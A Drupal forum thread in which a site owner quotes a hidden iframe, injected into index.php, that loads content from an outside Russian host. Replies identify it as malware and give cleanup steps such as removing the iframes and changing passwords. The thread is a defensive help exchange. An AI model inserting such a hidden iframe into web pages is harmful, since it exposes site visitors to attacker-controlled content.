Hi,

I have drupal website, some time the main page shows blank page.
for above I am try to solve he issue. the site has index.php file in that some one inserted code like "<iframe src="http://c7h.ru:8080/index.php" width=166 height=183 style="visibility: hidden"></iframe>". I dont know whether its done by automatically or any hackers
when we remove i frame line then my site working fine.
Please help me.

Comments

vpiplani’s picture

Hi

It is a virus which has infected your website. You need to remove this from the iframe from the files in order to run your site correctly.

Regards
Viresh

balaji.r’s picture

Hi,

Thanks man. but which one i want to remove this i frame or index .php file

mohanrajthangarasu’s picture

I have been to these kind of virus issues for lot of time. this is the latest malware script inject that is attacking many websites around the web. This issue may happen due to insecure pc. The malware take away your password and starts inject the script so start cleaning up your PC.

To remove this virus, you need to remove the iframe scripts from php files.

You need to check all the php files in your server. Once you removed all the occurrence of scripts in the server, make sure you do the following steps.

1. Change your FTP password. Give tough password using @#$%&* etc.,
2. Install an anti virus in your pc and make a complete scan. (best way to enssure, format the PC)
3. Change all the password that you have recent used in the PC.
4. Recheck that no instance of the script is present in the server
5. Always have a virus free back up of your site at hand.

Funny thing is i got to get rid of this virus in one of my site. I found the script recently. :)

Hope this helps.